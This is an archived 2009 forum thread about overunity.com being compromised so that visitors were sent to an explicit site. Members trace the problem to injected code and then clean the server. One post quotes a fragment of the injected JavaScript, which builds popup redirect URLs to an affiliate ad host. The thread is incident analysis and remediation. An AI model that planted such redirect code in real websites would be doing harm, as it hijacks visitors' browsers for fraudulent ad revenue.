Overunity.com Archives is Temporarily on Read Mode Only!



Free Energy will change the World - Free Energy will stop Climate Change - Free Energy will give us hope
and we will not surrender until free energy will be enabled all over the world, to power planes, cars, ships and trains.
Free energy will help the poor to become independent of needing expensive fuels.
So all in all Free energy will bring far more peace to the world than any other invention has already brought to the world.
Those beautiful words were written by Stefan Hartmann/Owner/Admin at overunity.com
Unfortunately now, Stefan Hartmann is very ill and He needs our help
Stefan wanted that I have all these massive data to get it back online
even being as ill as Stefan is, he transferred all databases and folders
that without his help, this Forum Archives would have never been published here
so, please, as the Webmaster and Creator of this Forum, I am asking that you help him
by making a donation on the Paypal Button above
Thanks to ALL for your help!!


Explicit content site opens when I enter overunity.com

Started by Fred Flintstone, May 09, 2009, 04:43:32 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages 1 ... 10 11 12 13 14
User actions

hansvonlieven

#55
May 11, 2009, 06:00:38 AM
You got to be right AquariuZ,

That 1traff.ru keeps coming up here but it is difficult to spot because the message is very brief. Well done.

Hans von Lieven
When all is said and done, more is said than done.     Groucho Marx

AquariuZ

#56
May 11, 2009, 06:09:06 AM
BTW to accomplish this, they DID at some point inject code into SMF.

If you wish to track down the culprit check the JS call from the server to 1traff.ru

The handler function uses a parameter called id to determine which affiliate is calling the ad server.

So someone is making money off third party sites using a russian affiliate program, they do not even have to be the owner of the skin sites. Pretty nifty.

PARTIAL QUOTE
function popup_4268ClUpTrafRu(gocode) {
   day = new Date(); URL192 = "http://yahhoou.com/search.php?id=XXXXX&go=" + gocode + "&close=" + gocode + "&hash=0668e20b3c9e9185b04b3d2a9dc8fa2d0&domain=builtwith.com&adult="; URL392 = "http://yahhoou.com/search.php?id=XXXXX&go=" + gocode + "&close=" + gocode + "&hash=0668e20b3c9e9185b04b3d2a9dc8fa2d&domain=builtwith.com&adult="; URL427 = "http://yahhoou.com/searcn.php?id=XXXXX&go=" + gocode + "&close=" + gocode + "&hash=0668e20b3c9e9185b04b3d2a9dc8fa2d&domain=builtwith.com&adult="; id = day.getTime();
END PARTIAL

Look at the XXXXX. It should contain a 5 digit affiliate code.

With that you can report & prosecute if you so desire.

AZ

hartiberlin

#57
May 11, 2009, 08:59:02 AM
Many thanks for all your help.

I made an FTP backup of all the server files
and then deleted them and restored the files
from my other domain.

Now it is all solved.

There were still some old scripts
from TinyPortal and some other scripts
stored in the webspace, maybe someone
used them to compromise other files.
But now these old files are all cleared and
now also the caching is working correctly.

Regards, Stefan.
Stefan Hartmann, Moderator of the overunity.com forum

AquariuZ

#58
May 11, 2009, 09:05:09 AM
Quote from: hartiberlin on May 11, 2009, 08:59:02 AM
Many thanks for all your help.

I made an FTP backup of all the server files
and then deleted them and restored the files
from my other domain.

Now it is all solved.

There were still some old scripts
from TinyPortal and some other scripts
stored in the webspace, maybe someone
used them to compromise other files.
But now these old files are all cleared and
now also the caching is working correctly.

Regards, Stefan.

Please note that all clients need to purge their .ru cookies and session data too.. (or all)

AZ

hartiberlin

#59
May 11, 2009, 09:08:50 AM
You mean,
alll users should clear their browser cookies and browser cache ?

In Firefox you can do this by going in the menu to:

Extras/Clear private data

and then select
cookies and
cache and
offline webpages datas.

Hope this helps.

Many thanks for your help.



Stefan Hartmann, Moderator of the overunity.com forum
Print
Go Up Pages 1 ... 10 11 12 13 14
User actions